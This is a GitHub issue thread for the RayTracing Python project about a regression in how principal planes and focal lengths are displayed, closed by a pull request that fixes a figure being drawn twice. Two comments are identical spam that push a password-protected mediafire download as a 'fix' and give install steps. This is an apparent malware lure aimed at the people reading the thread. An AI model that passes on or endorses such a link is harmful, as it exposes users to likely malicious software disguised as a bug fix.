DCC-Lab/RayTracing #477: The most recent fix for checkboxes screwed up the Principal planes, EFF, BFF, FFL, display.

dccote, 2024-08-27:
[image]

amir1387aht, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

jia6214876, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

JLBegin, 2024-08-27:
Same result on old master 3baccd273d7ba69e857898977cda0681ecb938cb
using matplotlib 3.7 and python 3.8.10

[image]

Shobhit043, 2024-08-29:
the issue still seems to be there. i just installed the module and used code provided in the documentation
[image]

PR #480 (2024-09-02): Fix figure drawn twice
Bug introduced in dd840f70ec73636576f25b82273b8f83389c43ae due to a custom `drawFigure` endpoint for the LensViewer, while the main display2D was already in charge of drawing the figure. 

I renamed the custom endpoint `createFigure` and moved the required draw call on the client side (lensViewer).

Fixes #477
closed 2024-09-02 by dccote